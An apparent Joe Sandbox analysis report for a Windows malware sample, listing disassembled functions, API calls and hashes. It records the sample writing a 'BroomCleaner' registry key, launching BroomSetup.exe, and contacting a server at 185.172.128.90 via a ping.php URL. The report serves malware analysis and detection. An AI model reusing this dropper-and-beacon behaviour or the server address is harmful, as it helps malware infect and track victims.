                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4526D74A01229DFDB64DF58C984BACBBB1BF09314F1480D9E54DAB351EB30AA85CF24
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0042612F Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1630 42612f-426166 call 4275a4 RegCreateKeyExA 1633 4261f7-4261fb 1630->1633 1634 42616c-42617f 1630->1634 1636 426206-426216 1633->1636 1637 4261fd-426200 RegCloseKey 1633->1637 1635 426182-426187 1634->1635 1635->1635 1638 426189-4261a8 call 402c71 1635->1638 1637->1636 1641 4261ab-4261b0 1638->1641 1641->1641 1642 4261b2-4261ea call 402c71 RegSetValueExA call 402bef 1641->1642 1646 4261ef-4261f2 call 402bef 1642->1646 1646->1633
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00426134
                                                                                                                                                                                                                                  • RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043CE50,SOFTWARE\BroomCleaner), ref: 0042615C
                                                                                                                                                                                                                                  • RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043CE50,0043CE51,Installed,Installed), ref: 004261DF
                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426200
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateH_prologValue
                                                                                                                                                                                                                                  • String ID: Installed$SOFTWARE\BroomCleaner
                                                                                                                                                                                                                                  • API String ID: 1996196666-529226407
                                                                                                                                                                                                                                  • Opcode ID: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction ID: 58fc235232bf4dd8c125a8bac87f810df134f3da6f2bb4c7cb0ac5f6772b16af
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3ebed42bd8a8a97b6f395c5c0a06025ece7bda2f9691e063b130d2fba8ebffaa
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 47319A71A00229AFDF149FA8DC949FEBB79FB48358F44412EE802B7291C7B55E05CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40synchronizationCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1648 426260-42626f 1649 426271-426277 1648->1649 1649->1649 1650 426279-4262ac ShellExecuteExA 1649->1650 1651 4262c5-4262d1 call 402bef 1650->1651 1652 4262ae-4262bf WaitForSingleObject CloseHandle 1650->1652 1652->1651
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(?,/BroomSetup.exe), ref: 004262A2
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,00008000), ref: 004262B6
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 004262BF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseExecuteHandleObjectShellSingleWait
                                                                                                                                                                                                                                  • String ID: /BroomSetup.exe
                                                                                                                                                                                                                                  • API String ID: 3837156514-1897133622
                                                                                                                                                                                                                                  • Opcode ID: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction ID: f0609d10c970eb56ece5b35627df0b7ec36997a903e398cb54ca8c4de5c5ad66
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db3e73961b18c1c10bd7b6012b861b807e274889a1b3163fb6465ff1849ddad4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66017C31E00218EBDF25EF69E9459DDBBB8EF08310F41812AF805A6260EB709A45CF94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1655 4163fd-416411 call 41e97a 1658 416413-416415 1655->1658 1659 416417-41641f 1655->1659 1660 416465-416485 call 41e8e9 1658->1660 1661 416421-416428 1659->1661 1662 41642a-41642d 1659->1662 1671 416493 1660->1671 1672 416487-416491 call 41234b 1660->1672 1661->1662 1664 416435-416449 call 41e97a * 2 1661->1664 1665 41644b-41645b call 41e97a FindCloseChangeNotification 1662->1665 1666 41642f-416433 1662->1666 1664->1658 1664->1665 1665->1658 1674 41645d-416463 GetLastError 1665->1674 1666->1664 1666->1665 1676 416495-416498 1671->1676 1672->1676 1674->1660
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 00416453
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427665,000000FF), ref: 0041645D
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00416488
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 490808831-0
                                                                                                                                                                                                                                  • Opcode ID: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction ID: aa9397e3c223395acf83e04721932d84fcb93a289d6ab5d19588dbc87750978f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 139c316f0d34cae01b774305b8ab889bfc55088184a7960cb4481621f44fdba6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4F016B33A101201AD6355675A8457FF2B494B82B38F27016FFC18972D1DF6CDCC6469D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1680 419767-41977f call 41e97a 1683 419781-419786 call 412381 1680->1683 1684 419792-4197a8 SetFilePointerEx 1680->1684 1690 41978c-419790 1683->1690 1685 4197b9-4197c3 1684->1685 1686 4197aa-4197b7 GetLastError call 41234b 1684->1686 1689 4197c5-4197da 1685->1689 1685->1690 1686->1690 1692 4197df-4197e4 1689->1692 1690->1692
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 004197B1
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2336955059-0
                                                                                                                                                                                                                                  • Opcode ID: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction ID: aba61adf325f610bb64cc2fd6d97dc3a8945be917003060b225fa659b6e0b810
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6955d807685c1ca33d0ae090671f376d44056e1be3e06fc28f14aab88d4da9d5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E012D37B20119ABCB159F99DC059EE7B19DF85330B28024EFC21972D0EA749C918798
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426217 Relevance: 4.5, APIs: 3, Instructions: 35fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1694 426217-42623c CreateFileA 1695 426259-42625f 1694->1695 1696 42623e-426253 WriteFile FindCloseChangeNotification 1694->1696 1696->1695
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,00002000,00000000,?,?,0042588E,00000001,?,00002000), ref: 00426232
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(00000000,?,?,00002000,00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042624A
                                                                                                                                                                                                                                  • FindCloseChangeNotification.KERNEL32(00000000,?,0042588E,00000001,?,00002000,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 00426253
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$ChangeCloseCreateFindNotificationWrite
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3805958096-0
                                                                                                                                                                                                                                  • Opcode ID: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction ID: 926e9ac1e5f1aba45008a0d26bda579428ca80e0843417663d772dc166ed892d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea6e1008648175cfb482bb30eeb8851ccd6d366c881e9156fb96c3698a6c4966
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 73E06572701120BBD7351B99AC48FABBE6DEF856F0F050169FB01E21109A61DC0197B4
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1705 401bb2-401c21 call 4275a4 call 40307c call 402fe5 call 402f6b 1714 401c51-401c61 1705->1714 1715 401c23-401c47 1705->1715 1715->1714 1716 401c49-401c4c call 40187f 1715->1716 1716->1714
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
                                                                                                                                                                                                                                    • Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E
                                                                                                                                                                                                                                    • Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
                                                                                                                                                                                                                                  • String ID: v*@
                                                                                                                                                                                                                                  • API String ID: 3966877926-3062513736
                                                                                                                                                                                                                                  • Opcode ID: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction ID: b9e6d0c04dc114dbe46ca1cb3692bd7dbb1da951860286197dc681cf7a8c4379
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 75af08b354eb886bb40f1edcec266cde64058157f3a774df709a09292bb85848
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E82190B1711206AFD708DF59C889A6AF7F9FF48348F14826EE115A7341C7B8DE008B94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00425EE2 Relevance: 3.1, APIs: 2, Instructions: 77COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                    • Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7
                                                                                                                                                                                                                                    • Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                  • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 420165198-0
                                                                                                                                                                                                                                  • Opcode ID: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction ID: 8b308e217030a11e536693c7e770bb36c60ea871e1947f1e620e0115d8c257f2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b93ceea2ca49065fabeb8f5add2c04d8e46cbf417997cc66e17ce7118fc6a16a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B311570D01119EBDB14EF95E985AEDFBB4BF48304F1080AEE805B3681EB786A04CB64
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 05BD0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1755 5bd0e0f-5bd0e24 SetErrorMode * 2 1756 5bd0e2b-5bd0e2c 1755->1756 1757 5bd0e26 1755->1757 1757->1756
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000400,?,?,05BD0223,?,?), ref: 05BD0E19
                                                                                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?,?,05BD0223,?,?), ref: 05BD0E1E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2279821604.0000000005BD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BD0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_5bd0000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorMode
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2340568224-0
                                                                                                                                                                                                                                  • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction ID: c1a164af8fd5c49b83710f357783f833f707ad06cda1ddffafae78d704cf732b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 24D0123154512C77D7003B94DC0DBCDBB1CDF09B62F008051FB0DD9080D770954046E5
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction ID: d77f3fb4a2dea80d7e26f58f35abdac3f7963be9eaf0666b1d936bf3e200b83d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ae4b7848d5fc5729d99f5a7e27ee10caa38967bc1771efee0ecf6ad26560584
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 11510771A00108AFDB10DF29C840BFA7BA1EF85364F19815EE8489B392CB39DD82C759
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __fread_nolock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2638373210-0
                                                                                                                                                                                                                                  • Opcode ID: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                  • Instruction ID: 0bde1253143090ae73d8540e9fd285f072e0ff93183f3a7406587cf81db67a05
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25aeabf7499e8ad583be7248ba51f421055d1c52451b24307ef19921f3e1bf67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CF316B31604706AFC710DE29C884A5ABBA0BF88354F04863EF954A73A1D779D854CB9A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004024A6
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
                                                                                                                                                                                                                                    • Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Exception@8H_prologThrowstd::system_error::system_error
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 938716162-0
                                                                                                                                                                                                                                  • Opcode ID: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
                                                                                                                                                                                                                                  • Instruction ID: 51a424f7f6e89c6a531f911fc24cb136489b0386115aa572e9e255c0d5409117
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1152c10f0f73a98428df0f9104ae7712f9923eb88e3ed4c89856aabc2728c85f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9318B71A00505AFCB18DF69C9D5E6AB7F5FF84318718C16EE416AB791C634EC40CB54
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402581
                                                                                                                                                                                                                                    • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                                                                                                  • Opcode ID: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
                                                                                                                                                                                                                                  • Instruction ID: 5794e906f2440793f0f111a630642e31dc7bb6ced8b38f44c89e924cf631a0c7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c318ff338f7a8eac22c397537d2360df678c12f2412966b479c09de5dfc03e1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87318770A00615AFCB15DF09CA84A9ABBB1FF48314F14856EE405AB791C7B9ED40CB94
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00402408
                                                                                                                                                                                                                                    • Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3519838083-0
                                                                                                                                                                                                                                  • Opcode ID: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction ID: 4e0495d31301cfc09fe992fc8428b3d42591f74c8e771436201b91ad316d0700
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed48e9fba55e0418c031890955b2c9948e55e9159a839dee9493f5c858f8f4c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D217C70601611DFC728DF19C54896ABBF5FF88314B20C26DE85A9B7A1C774AE41CB90
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041AFF9 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __wsopen_s
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3347428461-0
